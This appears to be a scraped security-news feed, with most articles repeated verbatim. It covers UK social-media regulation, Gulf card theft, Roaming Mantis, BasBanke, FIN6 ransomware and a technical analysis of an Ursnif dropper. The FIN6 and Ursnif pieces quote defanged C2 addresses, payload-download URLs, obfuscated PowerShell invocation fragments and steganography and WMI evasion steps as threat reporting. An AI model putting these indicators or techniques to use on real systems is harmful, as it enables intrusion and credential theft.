But, the implementation, is still in question along with other questions like, Will the regulatory approach be different for smaller companies?
Social media regulation and the improvements it requires is on everyone’s mind, of late because of the mosque shooting in New Zealand.
The shooting was live streamed on Facebook and other social media sites like Instagram, YouTube and etc. were rushed to block and delete the copies of the video which has instantly gone viral.
A legislation not very different from the one in UK that was discussed above was passed in Australia meaning to hold the executives responsible for whatever is posted on their platforms.



E Hacking News - Latest Hacker News and IT Security News

UK : Social Media Executives To Be Held Accountable For Destructive Content!



Reports have it, that according to a recent proposal of the UK authorities, social media executives shall be personally blamable for the harmful content on their platforms.
The freshly published paper in which the details were mentioned is just a tactic to restrict the spread of violent and detrimental content related to suicides and cyber bullying.
Disinformation, is another theme eluded upon along with the rising need for companies to hold their ground against terroristic, child abusive, and sexually abusive content.
The regulations and guidelines in the aforementioned paper also mention the requirement for every individual regulator to impose the rules.
Its’s high time, the online companies took responsibility for what content their platforms displayed, in an attempt to reinstate trust in technology within the society.
Files hosting sites, chat forums, messaging services, search engines and social media platforms alike will come under the belt of the aforementioned measures.
If not adhered to, the policies also mention within them strong punishments for companies including substantial fines and blocking access.
This is a great action which has potential to bring change. The implementation although could not be as simple as it all sounds.
The above-mentioned set of guidelines would provide for a stable code of conduct for everyone on the social media which if complied to, will lead to safer platforms.
But, the implementation, is still in question along with other questions like, Will the regulatory approach be different for smaller companies?
Social media regulation and the improvements it requires is on everyone’s mind, of late because of the mosque shooting in New Zealand.
The shooting was live streamed on Facebook and other social media sites like Instagram, YouTube and etc. were rushed to block and delete the copies of the video which has instantly gone viral.
A legislation not very different from the one in UK that was discussed above was passed in Australia meaning to hold the executives responsible for whatever is posted on their platforms.

2 students arrested for disrupting school WiFi to skip exam

By Waqas

Two 14-year old 9th graders have been arrested by the police for disrupting the WiFi system of their school, Secaucus High School, Hudson County in March. According to reports, the students used an especially designed app to make the connection so overloaded with traffic that it became difficult for the teachers to upload test results […]

This is a post from HackRead.com Read the original post: 2 students arrested for disrupting school WiFi to skip exam

Gulf countries came under hackers’ spotlight in 2018, with more than 130 000 payment cards compromised

Bahrain, 08.04.2019 – Group-IB, an international company that specializes in preventing cyberattacks, and NGN International, a global system integrator, analyzed cybersecurity landscape in Gulf countries in 2018.

Group-IB Threat Intelligence team identified compromised credentials of 7 306 users from the Gulf countries in 2018 and detected the total of 138 978 compromised cards issued by the Gulf countries’ banks.

Number of compromised cards ramps up in GCC

In 2018, Gulf countries including Bahrain, Kuwait, Oman, Qatar, Saudi Arabia and the United Arab Emirates (UAE) came under the spotlight of cybercriminals increasingly often. Group-IB Threat Intelligence experts detected a total of 138 978 compromised cards issued by the Gulf countries’ banks. This data comes not only from the analysis of underground forums and phishing websites, but also from the analysis of cybercriminals’ infrastructure (including but not limited to C&Cs) and malware disassembling.

“The stolen payment cards data is often put up for sale on underground forums or used in further fraudulent activities. Group-IB Threat Intelligence team continuously analyses compromised cards data all over the world. According to Group-IB’s annual Hi-Tech Crime Trends 2018 report, on average, from June 2017 to August 2018, the details of 1.8 million payment cards were uploaded to card shops monthly,” – comments Alexander Kalinin, head of Group-IB’s Computer Emergency Response Team (CERT-GIB).

gulf countries
Map of Middle-Eastern Countries.

CEO of NGN International, Yaqoob AlAwadhi stated that, from 2017 to 2018, cybercrimes aimed at financial thefts increased significantly with cyber-criminals largely exploiting software vulnerabilities through phishing mailings and hacked legal resources.

“The attacks lately have evolved a lot as attackers are beginning to use artificial intelligence and machine learning to bypass the defense, attempting what is known as ‘low-and-slow’ attacks,” explained Mr. AlAwadhi. “What is important is that successful struggle with such cyber-attacks is possible. It is extremely important to react to them in time and correctly, as well as to build a competent comprehensive protection system in advance,” he added.

With the advent of IoT technologies, big data and machine learning, attack tools become more advanced and encompass several information systems and resources. “Attacks on state information systems and resources, and resources of individual enterprises and industries, can lead to negative consequences for the economy of the country, while affecting the health and lives of people,” he stressed.

“Hence, the task of preventing information security incidents for critical information infrastructures should be addressed at the legislative level. NGN International offers customers a comprehensive approach to protecting information infrastructure: from protecting important critical information infrastructure objects to round-the-clock monitoring of security incidents based on Group-IB solutions,” stated Mr. AlAwadhi.

Compromised credentials

Group-IB Threat Intelligence team also identified leaked credentials of 7,306 users from the Gulf countries in 2018, among which the company experts discovered 1 227 compromised credentials from government resources in GCC. Upon identification of this information, CERT-GIB reached out to region’s government CERTs to inform about the threat.

“It is important to highlight that credentials were not leaked from government systems, which are most likely safe and secure, but from the individuals who used them for personal purposes. However, with the credentials from government websites, hackers can not only obtain classified information, but also infiltrate government networks and maintain presence while remaining unnoticed for long periods,” – says Alexander Kalinin. 

According to Group-IB experts, cybercriminals might have used special spyware to steal user credentials — formgrabbers, keyloggers, such as Pony Formgrabber and AZORult. According to Group-IB data, the two Trojans mentioned above were amongst the most popular for credentials stealing in 2018 in GCC.

Regularly updated Group-IB Threat Intelligence system allows to get actionable information about data leaks, compromised accounts, information about malware, infected IPs, and existing vulnerabilities across the world. Group-IB collects and analyses large amounts of unique and proprietary information to deliver tailored, trusted and actionable intelligence to predict risks, while preventing and mitigating any targeted attacks.

About Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

About NGN International

NGN International is a full-fledged systems integrator and IT consultancy established in 2015 in Bahrain as a part of NGN, a global system integrator operating in MENA since 2005.

Pierluigi Paganini

(SecurityAffairs – Gulf countries, hacking)

The post Gulf countries came under hackers’ spotlight in 2018, with more than 130 000 payment cards compromised appeared first on Security Affairs.

Security Affairs: Gulf countries came under hackers’ spotlight in 2018, with more than 130 000 payment cards compromised

Bahrain, 08.04.2019 – Group-IB, an international company that specializes in preventing cyberattacks, and NGN International, a global system integrator, analyzed cybersecurity landscape in Gulf countries in 2018.

Group-IB Threat Intelligence team identified compromised credentials of 7 306 users from the Gulf countries in 2018 and detected the total of 138 978 compromised cards issued by the Gulf countries’ banks.

Number of compromised cards ramps up in GCC

In 2018, Gulf countries including Bahrain, Kuwait, Oman, Qatar, Saudi Arabia and the United Arab Emirates (UAE) came under the spotlight of cybercriminals increasingly often. Group-IB Threat Intelligence experts detected a total of 138 978 compromised cards issued by the Gulf countries’ banks. This data comes not only from the analysis of underground forums and phishing websites, but also from the analysis of cybercriminals’ infrastructure (including but not limited to C&Cs) and malware disassembling.

“The stolen payment cards data is often put up for sale on underground forums or used in further fraudulent activities. Group-IB Threat Intelligence team continuously analyses compromised cards data all over the world. According to Group-IB’s annual Hi-Tech Crime Trends 2018 report, on average, from June 2017 to August 2018, the details of 1.8 million payment cards were uploaded to card shops monthly,” – comments Alexander Kalinin, head of Group-IB’s Computer Emergency Response Team (CERT-GIB).

gulf countries
Map of Middle-Eastern Countries.

CEO of NGN International, Yaqoob AlAwadhi stated that, from 2017 to 2018, cybercrimes aimed at financial thefts increased significantly with cyber-criminals largely exploiting software vulnerabilities through phishing mailings and hacked legal resources.

“The attacks lately have evolved a lot as attackers are beginning to use artificial intelligence and machine learning to bypass the defense, attempting what is known as ‘low-and-slow’ attacks,” explained Mr. AlAwadhi. “What is important is that successful struggle with such cyber-attacks is possible. It is extremely important to react to them in time and correctly, as well as to build a competent comprehensive protection system in advance,” he added.

With the advent of IoT technologies, big data and machine learning, attack tools become more advanced and encompass several information systems and resources. “Attacks on state information systems and resources, and resources of individual enterprises and industries, can lead to negative consequences for the economy of the country, while affecting the health and lives of people,” he stressed.

“Hence, the task of preventing information security incidents for critical information infrastructures should be addressed at the legislative level. NGN International offers customers a comprehensive approach to protecting information infrastructure: from protecting important critical information infrastructure objects to round-the-clock monitoring of security incidents based on Group-IB solutions,” stated Mr. AlAwadhi.

Compromised credentials

Group-IB Threat Intelligence team also identified leaked credentials of 7,306 users from the Gulf countries in 2018, among which the company experts discovered 1 227 compromised credentials from government resources in GCC. Upon identification of this information, CERT-GIB reached out to region’s government CERTs to inform about the threat.

“It is important to highlight that credentials were not leaked from government systems, which are most likely safe and secure, but from the individuals who used them for personal purposes. However, with the credentials from government websites, hackers can not only obtain classified information, but also infiltrate government networks and maintain presence while remaining unnoticed for long periods,” – says Alexander Kalinin. 

According to Group-IB experts, cybercriminals might have used special spyware to steal user credentials — formgrabbers, keyloggers, such as Pony Formgrabber and AZORult. According to Group-IB data, the two Trojans mentioned above were amongst the most popular for credentials stealing in 2018 in GCC.

Regularly updated Group-IB Threat Intelligence system allows to get actionable information about data leaks, compromised accounts, information about malware, infected IPs, and existing vulnerabilities across the world. Group-IB collects and analyses large amounts of unique and proprietary information to deliver tailored, trusted and actionable intelligence to predict risks, while preventing and mitigating any targeted attacks.

About Group-IB

Group-IB is a leading provider of solutions aimed at detection and prevention of cyberattacks, online fraud, and IP protection.

About NGN International

NGN International is a full-fledged systems integrator and IT consultancy established in 2015 in Bahrain as a part of NGN, a global system integrator operating in MENA since 2005.

Pierluigi Paganini

(SecurityAffairs – Gulf countries, hacking)

The post Gulf countries came under hackers’ spotlight in 2018, with more than 130 000 payment cards compromised appeared first on Security Affairs.



Security Affairs

Recent Roaming Mantis campaign hit hundreds of users worldwide

Kaspersky Lab reported that hundreds of users have been targeted with malware over the past month as part of a recent Roaming Mantis campaign.

Security experts at Kaspersky Lab reported that hundreds of users have been targeted with malware over the past month as part of a new campaign associated with Roaming Mantis gang.

Roaming Mantis surfaced in March 2018 when hacked routers in Japan redirecting users to compromised websites. Investigation by Kaspersky Lab indicates that the attack was targeting users in Asia with fake websites customized for English, Korean, Simplified Chinese and Japanese. Most impacted users were in Bangladesh, Japan, and South Korea.

The latest wave of attacks aimed at spreading phishing links via SMS messages (SMiShing), most of the victims were users in Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran, and Vietnam.

Researchers detected Roaming Mantis-related malware over 6,800 times for more than 950 unique users in the period between February 25 and March 20, 2019.

roaming mantis

Experts believe that the recent campaign has a much bigger scale compared with previous ones and the numbers reported in the analysis reflect only a small part of this campaign.

Attackers used a new method of phishing with malicious mobile configurations along with previously observed DNS manipulation technique.

Unlike previous attacks, this time Roaming Mantis attackers used a new landing page to target iOS devices in the attempt to trick victims into installing a malicious iOS mobile configuration.

The configuration allows the launch of the phishing site in a web browser and to gather information from the target’s device.

Android users have been infected with malware that Trend Micro tracked as XLoader and McAfee tracks as MoqHao.

“Our key finding is that the actor continues to seek ways to compromise iOS devices and has even built a new landing page for iOS users. When an iPhone user visits this landing page, she sees pop-up messages guiding her to the malicious iOS mobile config installation” reads the analysis published by Kaspersky.

“After installation of this mobile config, the phishing site automatically opens in a web browser and collected information from the device is sent to the attacker’s server. This information includes DEVICE_PRODUCT, DEVICE_VERSION, UDID, ICCID, IMEI and MEID.”

“On the Android front, our telemetry data shows a new wave of malicious APK files which we detect as “Trojan-Dropper.AndroidOS.Wroba.g”.

In late February 2019, experts detected a URL query of a malicious DNS changer that attackers used to compromise router DNS settings. The attack works if the following conditions are met: no authentication for the router’s control panel from the localnet; the device has an admin session for the router panel; and a simple username and password (or default) are used for the router, such as admin:admin.

Experts at Kaspersky discovered that several hundred routers have been compromised in this way and that all pointed to the rogue DNS IPs.

“We have seen increased distribution of sagawa.apk Type A since late February 2019. This wave is characterized by a new attack method of phishing with malicious mobile config, although the previously observed DNS manipulation is also still actively used.”
Kaspersky concludes “We find the use of malicious mobile config especially alarming as this may cause serious problems for the users,”

Pierluigi Paganini

(SecurityAffairs – Roaming Mantis, hacking)

The post Recent Roaming Mantis campaign hit hundreds of users worldwide appeared first on Security Affairs.

Security Affairs: Recent Roaming Mantis campaign hit hundreds of users worldwide

Kaspersky Lab reported that hundreds of users have been targeted with malware over the past month as part of a recent Roaming Mantis campaign.

Security experts at Kaspersky Lab reported that hundreds of users have been targeted with malware over the past month as part of a new campaign associated with Roaming Mantis gang.

Roaming Mantis surfaced in March 2018 when hacked routers in Japan redirecting users to compromised websites. Investigation by Kaspersky Lab indicates that the attack was targeting users in Asia with fake websites customized for English, Korean, Simplified Chinese and Japanese. Most impacted users were in Bangladesh, Japan, and South Korea.

The latest wave of attacks aimed at spreading phishing links via SMS messages (SMiShing), most of the victims were users in Russia, Japan, India, Bangladesh, Kazakhstan, Azerbaijan, Iran, and Vietnam.

Researchers detected Roaming Mantis-related malware over 6,800 times for more than 950 unique users in the period between February 25 and March 20, 2019.

roaming mantis

Experts believe that the recent campaign has a much bigger scale compared with previous ones and the numbers reported in the analysis reflect only a small part of this campaign.

Attackers used a new method of phishing with malicious mobile configurations along with previously observed DNS manipulation technique.

Unlike previous attacks, this time Roaming Mantis attackers used a new landing page to target iOS devices in the attempt to trick victims into installing a malicious iOS mobile configuration.

The configuration allows the launch of the phishing site in a web browser and to gather information from the target’s device.

Android users have been infected with malware that Trend Micro tracked as XLoader and McAfee tracks as MoqHao.

“Our key finding is that the actor continues to seek ways to compromise iOS devices and has even built a new landing page for iOS users. When an iPhone user visits this landing page, she sees pop-up messages guiding her to the malicious iOS mobile config installation” reads the analysis published by Kaspersky.

“After installation of this mobile config, the phishing site automatically opens in a web browser and collected information from the device is sent to the attacker’s server. This information includes DEVICE_PRODUCT, DEVICE_VERSION, UDID, ICCID, IMEI and MEID.”

“On the Android front, our telemetry data shows a new wave of malicious APK files which we detect as “Trojan-Dropper.AndroidOS.Wroba.g”.

In late February 2019, experts detected a URL query of a malicious DNS changer that attackers used to compromise router DNS settings. The attack works if the following conditions are met: no authentication for the router’s control panel from the localnet; the device has an admin session for the router panel; and a simple username and password (or default) are used for the router, such as admin:admin.

Experts at Kaspersky discovered that several hundred routers have been compromised in this way and that all pointed to the rogue DNS IPs.

“We have seen increased distribution of sagawa.apk Type A since late February 2019. This wave is characterized by a new attack method of phishing with malicious mobile config, although the previously observed DNS manipulation is also still actively used.”
Kaspersky concludes “We find the use of malicious mobile config especially alarming as this may cause serious problems for the users,”

Pierluigi Paganini

(SecurityAffairs – Roaming Mantis, hacking)

The post Recent Roaming Mantis campaign hit hundreds of users worldwide appeared first on Security Affairs.



Security Affairs

E Hacking News – Latest Hacker News and IT Security News: “BasBanke”: Android Malware That Hacks Financial/ Personal Data!








Introducing “BasBanke”, another malware in the already long list of Android malware, with Brazilians’ financial and personal details on the target.

Credit/debit card numbers, other financial data, and personal data of Brazilians is what the cyber-cons are hunting for, via the malware.

This malware has been effective through malicious applications since 2018 Brazilian elections. Downloads of over 10,000 from the Google store were made.

By way of social media platforms like Facebook and WhatsApp the user were tricked into downloading the malware.



Later on attacks like ‘keystroke logging’, ‘SMS interception’ and ‘screen recording’ were also observed.

The advertising campaign’s URL hinted to the legitimate Google Play Store.
A malicious app which goes by the name of “CleanDroid” is another of the malicious apps which was advertised about on Facebook along with a download link.

The aforementioned application pretends to help in protecting the victim’s device from viruses and optimizing memory space.


Google play store hosts a lot of such illegitimate android apps who pretend to be QR readers or travel guides all the way tricking the victim.

A similar malicious campaign was discovered by a leading anti-virus organization but with relatively less distribution rates.

On the distributor front, social media played a vital role in it too.



Hunting and hacking down the metadata such as IMEI, telephone numbers, device names along with other personal stuff is the main agenda.

This data after getting collected is sent to the HQ of the cyber-hackers via C2 server.

Platforms like Netflix, YouTube and Spotify immediately turned up their security measures after perceiving that the banking details were being hunted.



E Hacking News - Latest Hacker News and IT Security News

“BasBanke”: Android Malware That Hacks Financial/ Personal Data!








Introducing “BasBanke”, another malware in the already long list of Android malware, with Brazilians’ financial and personal details on the target.

Credit/debit card numbers, other financial data, and personal data of Brazilians is what the cyber-cons are hunting for, via the malware.

This malware has been effective through malicious applications since 2018 Brazilian elections. Downloads of over 10,000 from the Google store were made.

By way of social media platforms like Facebook and WhatsApp the user were tricked into downloading the malware.



Later on attacks like ‘keystroke logging’, ‘SMS interception’ and ‘screen recording’ were also observed.

The advertising campaign’s URL hinted to the legitimate Google Play Store.
A malicious app which goes by the name of “CleanDroid” is another of the malicious apps which was advertised about on Facebook along with a download link.

The aforementioned application pretends to help in protecting the victim’s device from viruses and optimizing memory space.


Google play store hosts a lot of such illegitimate android apps who pretend to be QR readers or travel guides all the way tricking the victim.

A similar malicious campaign was discovered by a leading anti-virus organization but with relatively less distribution rates.

On the distributor front, social media played a vital role in it too.



Hunting and hacking down the metadata such as IMEI, telephone numbers, device names along with other personal stuff is the main agenda.

This data after getting collected is sent to the HQ of the cyber-hackers via C2 server.

Platforms like Netflix, YouTube and Spotify immediately turned up their security measures after perceiving that the banking details were being hunted.

FIN6 group starts using LockerGoga and Ryuk Ransomware

Security experts at FireEye observed the financially motivated group FIN6 adding the LockerGoga and Ryuk ransomware to its arsenal.

According to cybersecurity experts at FireEye, the FIN6 cybercrime group is diversifying its activities and added LockerGoga and Ryuk ransomware to its arsenal.

Previous attacks conducted by the FIN6 group aimed at compromising point-of-sale (PoS) systems, but recent operations conducted by the group expanded its targets and hit entities in the engineering industry.

“Recently, FireEye Managed Defense detected and responded to a FIN6 intrusion at a customer within the engineering industry, which seemed out of character due to FIN6’s historical targeting of payment card data.” reads the analysis published by FireEye.

“FIN6 has expanded their criminal enterprise to deploy ransomware in an attempt to further monetize their access to compromised entities.

This blog post details the latest FIN6 tactics, techniques, and procedures (TTPs), including ties to the use of LockerGoga and Ryuk ransomware families.”

Recent attacks involving both Ryuk and LockerGoga were attributed to FIN6 crime gang or some of its members that appear to have operated independently.

Experts have traced these intrusions back to July 2018, they have caused the loss of tens of millions of dollars to the victims.

The recent wave of attacks attributed to FIN6 leverage on stolen credentials, Cobalt Strike, Metasploit, and other publicly available tools in the reconnaissance phase.

Attackers used Windows’ Remote Desktop Protocol (RDP) for lateral movement, the attackers used the following techniques to carry on the attacks:

  • Attackers used PowerShell to execute an encoded command to add Cobalt Strike to the compromised system and execute a chain of payloads until retrieving a final one.
  • Attackers created random Windows services to execute encoded PowerShell command that included a reverse HTTP shellcode payload stored in a byte-array like the first technique.
FIN6 Powershell

“The Metasploit reverse HTTP payload was configured to communicate with the command and control (C2) IP address 176.126.85[.]207 with a randomly named resource such as “/ilX9zObq6LleAF8BBdsdHwRjapd8_1Tl4Y-9Rc6hMbPXHPgVTWTtb0xfb7BpIyC1Lia31F5gCN_btvkad7aR2JF5ySRLZmTtY” over TCP port 443. This C2 URL contained shellcode that would make an HTTPS request for an additional download.” continues the analysis.

“To achieve privilege escalation within the environment, FIN6 utilized a named pipe impersonation technique included within the Metasploit framework that allows for SYSTEM-level privilege escalation.”

Attackers leverage AdFind to query the Active Directory and make lateral movements, they used 7-Zip to compress the data before sending it to the C2 server.

“Criminal operations and relationships are highly adaptable, so we commonly encounter such attribution challenges in regards to criminal activity.” concludes FireEye. “Given that these intrusions have been sustained for almost a year, we expect that continued research into further intrusion attempts may enable us to more fully answer these questions regarding FIN6’s current status,”

Further technical details, including Indicators of Compromise, are reported in the analysis published by FireEye.

Pierluigi Paganini

(SecurityAffairs – FIN6, hacking)

The post FIN6 group starts using LockerGoga and Ryuk Ransomware appeared first on Security Affairs.

Security Affairs: FIN6 group starts using LockerGoga and Ryuk Ransomware

Security experts at FireEye observed the financially motivated group FIN6 adding the LockerGoga and Ryuk ransomware to its arsenal.

According to cybersecurity experts at FireEye, the FIN6 cybercrime group is diversifying its activities and added LockerGoga and Ryuk ransomware to its arsenal.

Previous attacks conducted by the FIN6 group aimed at compromising point-of-sale (PoS) systems, but recent operations conducted by the group expanded its targets and hit entities in the engineering industry.

“Recently, FireEye Managed Defense detected and responded to a FIN6 intrusion at a customer within the engineering industry, which seemed out of character due to FIN6’s historical targeting of payment card data.” reads the analysis published by FireEye.

“FIN6 has expanded their criminal enterprise to deploy ransomware in an attempt to further monetize their access to compromised entities.

This blog post details the latest FIN6 tactics, techniques, and procedures (TTPs), including ties to the use of LockerGoga and Ryuk ransomware families.”

Recent attacks involving both Ryuk and LockerGoga were attributed to FIN6 crime gang or some of its members that appear to have operated independently.

Experts have traced these intrusions back to July 2018, they have caused the loss of tens of millions of dollars to the victims.

The recent wave of attacks attributed to FIN6 leverage on stolen credentials, Cobalt Strike, Metasploit, and other publicly available tools in the reconnaissance phase.

Attackers used Windows’ Remote Desktop Protocol (RDP) for lateral movement, the attackers used the following techniques to carry on the attacks:

  • Attackers used PowerShell to execute an encoded command to add Cobalt Strike to the compromised system and execute a chain of payloads until retrieving a final one.
  • Attackers created random Windows services to execute encoded PowerShell command that included a reverse HTTP shellcode payload stored in a byte-array like the first technique.
FIN6 Powershell

“The Metasploit reverse HTTP payload was configured to communicate with the command and control (C2) IP address 176.126.85[.]207 with a randomly named resource such as “/ilX9zObq6LleAF8BBdsdHwRjapd8_1Tl4Y-9Rc6hMbPXHPgVTWTtb0xfb7BpIyC1Lia31F5gCN_btvkad7aR2JF5ySRLZmTtY” over TCP port 443. This C2 URL contained shellcode that would make an HTTPS request for an additional download.” continues the analysis.

“To achieve privilege escalation within the environment, FIN6 utilized a named pipe impersonation technique included within the Metasploit framework that allows for SYSTEM-level privilege escalation.”

Attackers leverage AdFind to query the Active Directory and make lateral movements, they used 7-Zip to compress the data before sending it to the C2 server.

“Criminal operations and relationships are highly adaptable, so we commonly encounter such attribution challenges in regards to criminal activity.” concludes FireEye. “Given that these intrusions have been sustained for almost a year, we expect that continued research into further intrusion attempts may enable us to more fully answer these questions regarding FIN6’s current status,”

Further technical details, including Indicators of Compromise, are reported in the analysis published by FireEye.

Pierluigi Paganini

(SecurityAffairs – FIN6, hacking)

The post FIN6 group starts using LockerGoga and Ryuk Ransomware appeared first on Security Affairs.



Security Affairs

How to identify & protect yourself from online dating scams

By Waqas

The Internet is an addictive world due to its unlimited and lucrative opportunities for people from almost every facet of life. Some use the Internet to make money, some use it to keep in touch with their loved ones, and some to find love – and then there are those who use it for nefarious […]

This is a post from HackRead.com Read the original post: How to identify & protect yourself from online dating scams

Ursnif: The Latest Evolution of the Most Popular Banking Malware

ZLab Yoroi-Cybaze dissected another attack wave of Ursnif Trojan, aka Gozi ISFB, an offspring of the original Gozi which source code was leaked in 2014. ZLab Yoroi-Cybaze dissected another attack wave of Ursnif Trojan, aka Gozi ISFB, an offspring of the original Gozi which source code was leaked in 2014.

Introduction

A few days ago, the researchers of ZLab Yoroi-Cybaze dissected another attack wave of the infamous Ursnif malware, also known as Gozi ISFB, an offspring of the original Gozi which source code was leaked in 2014. Ursnif/Gozi is active from over a decade and was one of the most active malware listed in 2017 and 2018. Today it constantly reaches several organization across Italy presenting itself in several ways, for instance as a malicious document delivered through email. 

The malware has evolved over time and has added functionality, in fact, apart from collecting banking credentials it is also able to collect keystrokes, cryptocurrencies, screenshots, webmail, integrating spyware features together with banking Trojans features.

During their investigations, researchers of ZLab Yoroi-Cybaze intercept a new variant of this malware delivered through malspam campaign towards Italian companies. This latest Ursnif variant shows the same modus operandi: a malicious document in which is embedded an highly obfuscated VBA macro that acts as a first stage dropper.

The Ursnif Threat Evolution

According to Microsoft since its appearance in 2009, Ursnif has shown incredible capabilities to steal users’ credentials, credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites while remaining more stealthiness as possible. It uses many advanced trick to evade several sandboxes environment and today is the most popular malware spreading in the wild. ZLab researchers have studied many samples in the past to profile the techniques used by the malware, to track its evolution and sophistication over time.

Table 1: Ursnif techniques evolution

First analyzed sample backs to January 2018. That Ursnif variant has delivered through a macro document and consist of a few obfuscated stage and a process hollowing injection technique to execute its payload. After a few months, in June 2018, we find evidence that  Ursnif was delivered through Necurs Botnet. The latter is one of the most famous botnets known nowadays and it has been used to deliver this Ursnif variant. The hidden link among Necurs and Ursnif has been discovered by ZLab researchers as explained in this link. In December 2018, a first shift is about the implementation of many dropper stages, in order to hide the final payload; moreover, in order to execute its payload, the malware does not perform a classical process injection as in the previous samples but an APC injection, not yet seen as payload injection trick used by Ursnif. 

The sample spread in February 2019 use two new features: the first one is a several obfuscated powershell stages in order to evade AVs and reduce its detection, the second one is the use of steganography technique. The latter permit to hide code into a legit image manipulating specific bits. Next, another code perform a decryption and execution of malicious code into the victim machine. 

In March 2019 another weaponized variant of Ursnif has been detected: in this case, to spread the malicious software, a google drive document combined with an obfuscated VBA Script is used over steganography. The last sample shown in previous table is similar to February’s sample but include another interesting feature: in this case a first VBS stage is encrypted using the Vigenere cipher; this allow to hide its malicious code and evade many sandboxes environment. We are observing a continuous evolution due to several features added in few months, this is an indicator that this malware is still in development and, observing also features fragmentation among variants lets us think, with high confidence, that there are various fork of the same codebase spreading in the wild.

Technical Analysis

Sha 25634669dde1e33ec96147540433f60e90056d38df1e3bb952fdc600e979d74f690
ThreatUrsnif dropper
Descrizione BreveExcel with macro
ssdeep1536:hn1DN3aMePUKccCEW8yjJTdrBX/3t4k3hOdsylKlgryzc4bNhZFGzE+cL4LgldAK:hn1DN3aM+UKc

Table 2: information about Ursnif dropper

The most widespread infection vector observed were the macro enabled office documents, and this variant uses the same technique too. The malicious document looks like an invoice that requires enabling macros in order to proper view its contents. 

Figure 1: excel document requiring macro enabling

The whole infection chain begins when the macro is enabled. This Ursnif variant presents a  macro protection technique technique that it’s not present in previous variants, in order to make the analysis hard avoiding manipulation and extraction. After extraction of OLE object inside the document we are able to see the content of macros and their associated name, as shown in the following figure:

Figure 2: macros isolation

Now it is possible to isolate an interesting macro in order to further analyze it in detail. It contains a piece of VBA that was extracted.

Figure 3: VB macro source code

In a different way than the past waves, the malware author added a “VigenereDo” function to decrypt and reconstruct the initial infection step, using an algorithm based on the Vigenère cipher, a classical polyalphabetic cipher. 

The resulting command text is obtained combining the obfuscated strings defined in “jeneric” function with other strings (not visible in figure) and after further some manipulations is possible to spot the whole script will be executed. When user enable macros, the “wmic.exe” process run the following code through the “wmic ‘PRocesS’   “Call” ‘CREATe’” command. 

Figure 4: the powershell script (crypted)

So, at this point, several powershell deobfuscation steps occurs. First of all, every value (“${1F}”) defined in the ps string is replaced with content stored into “$1F” variable corresponding to “,” (comma) character. After having replaced these values, the script is run through “iex” primitive invoked by “.($psHomE[4]+$pshOMe[34]+’X’)” and next through “( “. ( `$ShELLid[1]+`$shelLID[13]+’X’)”. The complete deobfuscated script is the following.

Figure 5:  the first powershell script (decrypted)
Figure 6: image with malicious embedded powershell script

First of all the malware checks the current TimeZone in order to verify if it is set on +01:00.  If true, it download the next stage from “hxxps://i[.]imgur[.]com/TVkWKQa[.]png”. As well as in other recent attacks, the downloaded image hides another powershell stage leveraging steganography techniques. 

The malware code iterates over each pixel of the image and through several mathematical binary operation converts grabs the two Least Significant Bits of every byte of the picture, concatenating them with other LSBs to produce a complete Powershell code.

Figure 7: second powershell script extracted from the steganographic image

Et voilà, another URL is found but, before download the next stage from it, the malware perform a further checking in order to evaluate the value returned by “CurrentCulture”. 

Figure 8: CurrentCulter verification in powershell

If check is verified, once again through the “IEX” primitive it try to download other components named “ose000000.exe” from “hxxps://nuovalo[.]site/RGI82B3.-tmp-tmp”, saving  it into “%TEMP%” folder. In the following table are shown the information about sample.

Sha 2560f2245eec921949d9a1d8e13cab747a7fbb137aaee3b9ddacee0681c8b2e4fa8
ThreatUrsnif
Descrizione BreveFinal payload of Ursnif banking malware
ssdeep6144:LCLAh6EzJYJtmavTXyulcNcyuo8PGJMewXo79y:L54EzetmCb3cNc3o0PR4

Table 3: information about Ursnif final payload

Conclusion

This latest Ursnif wave keeps showing a complex infection process. The starting point of the entire chain was the usual Visual Basic macro, this time protecting its code with a Vigenère cipher, responsible of the decryption of the additional Powershell stage launched abusing the Windows Management Infrastructure (WMI) functionalities, decoupling it to the original infection tree and then completing the infection chain exploiting steganography techniques to bypass network detection and several environmental check, to ensure the malware is running into expected machines confirming the highly evasive trend of this aggressive malware threat.

Further technical details, including Indicators of Compromise, are reported in the analysis published on the Yoroi blog.

Pierluigi Paganini

(SecurityAffairs – Ursnif Trojan, cybercrime)

The post Ursnif: The Latest Evolution of the Most Popular Banking Malware appeared first on Security Affairs.

Security Affairs: Ursnif: The Latest Evolution of the Most Popular Banking Malware

ZLab Yoroi-Cybaze dissected another attack wave of Ursnif Trojan, aka Gozi ISFB, an offspring of the original Gozi which source code was leaked in 2014. ZLab Yoroi-Cybaze dissected another attack wave of Ursnif Trojan, aka Gozi ISFB, an offspring of the original Gozi which source code was leaked in 2014.

Introduction

A few days ago, the researchers of ZLab Yoroi-Cybaze dissected another attack wave of the infamous Ursnif malware, also known as Gozi ISFB, an offspring of the original Gozi which source code was leaked in 2014. Ursnif/Gozi is active from over a decade and was one of the most active malware listed in 2017 and 2018. Today it constantly reaches several organization across Italy presenting itself in several ways, for instance as a malicious document delivered through email. 

The malware has evolved over time and has added functionality, in fact, apart from collecting banking credentials it is also able to collect keystrokes, cryptocurrencies, screenshots, webmail, integrating spyware features together with banking Trojans features.

During their investigations, researchers of ZLab Yoroi-Cybaze intercept a new variant of this malware delivered through malspam campaign towards Italian companies. This latest Ursnif variant shows the same modus operandi: a malicious document in which is embedded an highly obfuscated VBA macro that acts as a first stage dropper.

The Ursnif Threat Evolution

According to Microsoft since its appearance in 2009, Ursnif has shown incredible capabilities to steal users’ credentials, credentials for local webmail, cloud storage, cryptocurrency exchange platforms and e-commerce sites while remaining more stealthiness as possible. It uses many advanced trick to evade several sandboxes environment and today is the most popular malware spreading in the wild. ZLab researchers have studied many samples in the past to profile the techniques used by the malware, to track its evolution and sophistication over time.

Table 1: Ursnif techniques evolution

First analyzed sample backs to January 2018. That Ursnif variant has delivered through a macro document and consist of a few obfuscated stage and a process hollowing injection technique to execute its payload. After a few months, in June 2018, we find evidence that  Ursnif was delivered through Necurs Botnet. The latter is one of the most famous botnets known nowadays and it has been used to deliver this Ursnif variant. The hidden link among Necurs and Ursnif has been discovered by ZLab researchers as explained in this link. In December 2018, a first shift is about the implementation of many dropper stages, in order to hide the final payload; moreover, in order to execute its payload, the malware does not perform a classical process injection as in the previous samples but an APC injection, not yet seen as payload injection trick used by Ursnif. 

